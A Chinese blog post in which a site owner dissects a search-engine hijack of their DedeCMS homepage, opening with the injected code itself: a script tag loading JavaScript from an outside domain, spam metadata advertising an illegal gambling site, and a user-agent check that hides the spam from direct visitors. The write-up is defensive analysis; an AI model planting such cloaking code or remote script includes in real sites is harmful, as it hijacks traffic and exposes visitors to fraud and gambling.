<script language="javascript" type="text/javascript" src="http://mhhb.net/include/7039j.js" ></script>
腾讯分分彩官网_腾讯分分彩注册_腾讯分分彩平台</title>
<meta name="keywords" content="腾讯分分彩官网,腾讯分分彩注册,腾讯分分彩平台"/>
<meta name="description" content="腾讯分分彩【唯一官网平台开奖直播7039j.com】时时精准提供腾讯分分彩开奖结果,腾讯分分彩历史记录,腾讯分分彩技巧和玩法,腾讯分分彩全天人工计划!
"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="计科之路"}</script>这是一次新的体验。网站应该还有很多漏洞之处。在这写下这些代码,供大家参考分析。
一个首页,仅只有一个html文件 , 不知道从哪 个后门增加了这种情况。
【1】if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title = "{dede:global.cfg_webname/}"}
大家来看这段JS,JS里面包含一个判断,是根据什么判断呢,这是是根据userAgent来判断,如果不是百度来的,那就显示网站本身的标题,所以这也就是为什么我们直接打开网页,(输入网址的方式打开)而显示正常标题的原因。
【2】
这个是Unicode编码转换 http://tool.chinaz.com/tools/unicode.aspx 中文如下:
腾讯分分彩官网,腾讯分分彩注册,腾讯分分彩平台
【3】<meta name="description" content="
腾讯分分彩【唯一官网平台开奖直播7039j.com】时时精准提供腾讯分分彩开奖结果,腾讯分分彩历史记录,腾讯分分彩技巧和玩法,腾讯分分彩全天人工计划!
说是百度快照 劫持,其实只要是搜索引擎来的都会劫持。跳转到另一个短网址,而短网址解密出来:
就是这个BC网站,这些黑客真是煞费苦心。
